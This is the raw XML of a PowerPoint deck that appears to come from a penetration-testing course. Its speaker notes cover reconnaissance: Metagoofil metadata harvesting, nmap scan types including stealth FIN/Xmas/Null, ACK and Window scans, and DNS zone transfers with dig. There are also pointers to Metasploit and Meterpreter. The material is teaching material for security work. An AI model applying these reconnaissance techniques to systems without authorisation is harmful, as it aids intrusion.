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99"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="412" r:id="rId2"/>
    <p:sldId id="413" r:id="rId3"/>
    <p:sldId id="414" r:id="rId4"/>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476" r:id="rId66"/>
    <p:sldId id="477" r:id="rId67"/>
    <p:sldId id="479" r:id="rId68"/>
    <p:sldId id="480" r:id="rId69"/>
    <p:sldId id="481" r:id="rId70"/>
    <p:sldId id="482" r:id="rId71"/>
    <p:sldId id="483" r:id="rId72"/>
    <p:sldId id="484" r:id="rId73"/>
    <p:sldId id="485" r:id="rId74"/>
    <p:sldId id="486" r:id="rId75"/>
    <p:sldId id="487" r:id="rId76"/>
    <p:sldId id="488" r:id="rId77"/>
    <p:sldId id="489" r:id="rId78"/>
    <p:sldId id="490" r:id="rId79"/>
    <p:sldId id="491" r:id="rId80"/>
    <p:sldId id="492" r:id="rId81"/>
    <p:sldId id="493" r:id="rId82"/>
    <p:sldId id="494" r:id="rId83"/>
    <p:sldId id="495" r:id="rId84"/>
    <p:sldId id="496" r:id="rId85"/>
    <p:sldId id="497" r:id="rId86"/>
    <p:sldId id="498" r:id="rId87"/>
    <p:sldId id="499" r:id="rId88"/>
    <p:sldId id="500" r:id="rId89"/>
    <p:sldId id="501" r:id="rId90"/>
    <p:sldId id="502" r:id="rId91"/>
    <p:sldId id="503" r:id="rId92"/>
    <p:sldId id="504" r:id="rId93"/>
    <p:sldId id="505" r:id="rId94"/>
    <p:sldId id="506" r:id="rId95"/>
    <p:sldId id="507" r:id="rId96"/>
    <p:sldId id="508" r:id="rId97"/>
    <p:sldId id="509" r:id="rId9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56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0" autoAdjust="0"/>
    <p:restoredTop sz="85658" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="94" d="100"/>
          <a:sy n="94" d="100"/>
        </p:scale>
        <p:origin x="-73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88"/>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0152C7E-10D1-F144-9A4D-C61469F04A52}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11202651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www.youtube.com/watch?v=j-r5uFmuioA"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sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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Metagoofil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> is an information gathering tool designed for extracting metadata of public documents (pdf,doc,xls,ppt,docx,pptx,xlsx) belonging to a target company. Metagoofil will perform a search in Google to identify and download the documents to local disk and then will extract the metadata with different libraries like Hachoir, PdfMiner? and others. With the results it will generate a report with usernames, software versions and servers or machine names that will help Penetration testers in the information gathering phase.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378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9417DE-E4E4-8149-A0C2-07DF61E284B6}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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E5F300E-7409-544C-A43E-0F17D4B386B7}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> accepts multiple host specifications on the command line, and they don't need to be the same type.</a:t>
            </a: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E53343-83A1-8C43-9428-F04071AA6ECB}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> accepts multiple host specifications on the command line, and they don't need to be the same type.</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ECD53D-C131-814F-A02D-F30D2CB07381}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> accepts multiple host specifications on the command line, and they don't need to be the same type.</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AC4F94-A645-E540-BC80-DDE58B471B0F}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> accepts multiple host specifications on the command line, and they don't need to be the same type.</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63EA3E-ECF9-874A-A8B9-DC07F7010DE1}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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Try not to use the connect() scan unless it's absolutely necessary. It's very obvious (in both network traces and in application log files), and it uses many more system and application resources than the SYN scan!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>TCP connect() Scan (-sT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Requires Privileged Access: NO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Identifies TCP Ports: YES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Identifies UDP Ports: NO</a:t>
            </a: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21C193-5700-EF43-8458-A1E6AB813626}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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On metaspoitable</a:t>
            </a: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ACCA6-D8DC-7944-894D-2BB7F25FEDD4}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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23FA73-E510-9649-A656-AACA32E2ECB6}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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most common of these scans is the FIN scan, which attempts to close a connection that isn't open. If no service is listening at the target port, the operating system will generate an error message. If a service is listening, the operating system will silently drop the incoming packet. Therefore, no response indicates a listening service at the port. However, since packets can be dropped accidentally on the wire or by firewalls, this isn't a very effective scan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B0152C7E-10D1-F144-9A4D-C61469F04A52}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74282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805C95-2F46-A843-A76D-DDA782261E54}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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501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8E456E-50DF-E047-AFE2-7EB29B13F66B}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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522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B28B8E-4542-1E46-AB08-5B78BAC41162}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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542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0C7C8C-A3BB-294A-BEC1-D335F7B54865}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Steath Scanning - The FIN Scan (-sF), Xmas Tree Scan (-sX), and Null Scan (-sN)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Requires Privileged Access: YES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Identifies TCP Ports: YES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Identifies UDP Ports: NO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>These three scans are grouped together because their individual functionality is very similar. These are called "stealth" scans because they send a single frame to a TCP port without any TCP handshaking or additional packet transfers. This is a scan type that sends a single frame with the expectation of a single response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>These scans operate by manipulating the bits of the TCP header to induce a response from the remote station. Different TCP/IP stacks may handle these scans in different ways, so it may be necessary to run additional non-stealth scans to get the best overview of responses. For example, Windows-based systems will reply with a RST frame for all queries, regardless of the status of the specific port that was queried. If open|filtered ports appear during an nmap stealth scan, the remote device is definitely not a Windows-based system! Windows-based systems aren't the only TCP/IP stacks that work this way, so special attention should be taken when the results show that all ports are closed; this may not really be the case!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRP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2E99D8-8924-EF40-AD04-3E3960442854}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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The ACK scan probe packet has only the ACK flag set (unless you use --scanflags). When scanning unfiltered systems, open and closed ports will both return a RST packet. Nmap then labels them as unfiltered, meaning that they are reachable by the ACK packet, but whether they are open or closed is undetermined. Ports that don't respond, or send certain ICMP error messages back (type 3, code 1, 2, 3, 9, 10, or 13), are labeled filtered.</a:t>
            </a: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FF5354-4992-9243-B853-6AE55C546E3D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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EFF99E-9307-294C-A599-36B987761B96}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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Window scan is exactly the same as ACK scan except that it exploits an implementation detail of certain systems to differentiate open ports from closed ones, rather than always printing unfiltered when a RST is returned. It does this by examining the TCP Window field of the RST packets returned. On some systems, open ports use a positive window size (even for RST packets) while closed ones have a zero window. So instead of always listing a port as unfiltered when it receives a RST back, Window scan lists the port as open or closed if the TCP Window value in that reset is positive or zero, respectively.</a:t>
            </a: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8904606-E352-4D4C-AD05-3CB15FBCE3FD}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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284195-9D9C-1545-83D3-67249989D7C3}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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14C4F5-0F55-8F4C-8D6B-92A22C050D42}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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696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D23BD3-9415-2D46-B082-55BD9E4F833E}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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5DC7B40-3B96-244C-AC93-CD40319B0B84}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr 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FBD0EC-9008-CA4B-B6C1-3EDA8948B5B5}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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Listen client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=j-r5uFmuioA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>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79BAB8-8918-8845-AFE4-3AF83DAFDC51}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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VNC: remote control PC software that allows a user to connect to a remote machine, view the remote machine and control mouse and keyboard as if you were physically sitting at that machine. It works much the same as Remote Desktop or a Terminal Server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>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80328A-A41C-E445-A41B-2329D1F55B03}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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http://netsec.cs.northwestern.edu/media/handouts/metasploit.pdf</a:t>
            </a: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D19D7F-A4EB-5B40-8D19-DADE41BDFE5C}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>79</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503A1E-B65D-9440-8CFC-442EF9496B6D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient</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94EC28F-719B-6F44-88A8-9794E4AFE464}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>92</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3FA04B-1030-DC48-81D0-B1C14144A71D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>93</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3D29A0-A2BA-8247-94DE-D315C7E03731}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>94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5D2D18-CE20-8941-95E2-FF7A87DC94C7}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="12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AA7BE2-6DDD-844C-9BCE-DBEA5826541C}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="12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6B3166-80BA-414C-A446-9D24D87D1AFC}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="12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B51E63-9157-4244-9802-8367F2CE2C1D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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DNS zone transfer, also sometimes known by the inducing DNS query type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>AXFR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> , is a type of DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>transaction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It is one of the many mechanisms available for administrators to replicate DNS databases across a set of DNS servers.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 zone transfer uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Transmission Control Protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TCP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for transport, and takes the form of a client–server transaction. The client requesting a zone transfer may be a slave server or secondary server, requesting data from a master server, sometimes called a primary server. The portion of the database that is replicated is a zone.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u="none" strike="noStrike" dirty="0">
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>AXFR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> is a protocol for “zone transfers” for replication of DNS data across multiple DNS servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>The zone transfer is the method a secondary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>DNS server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> uses to update its information from the primary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>DNS server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Dig @server name type </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Type can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ANY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>MX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>SIG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>etc.</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69689E-0E1D-D44A-95FA-2A5485A4B639}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW"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It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>helps you locate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IP space hostnames against specified targeted domain name. It provides different techniques to gather information about your victim. This tool starts with zone transfer technique and quickly switch into brute force mode if zone transfer feature is restricted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B0152C7E-10D1-F144-9A4D-C61469F04A52}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
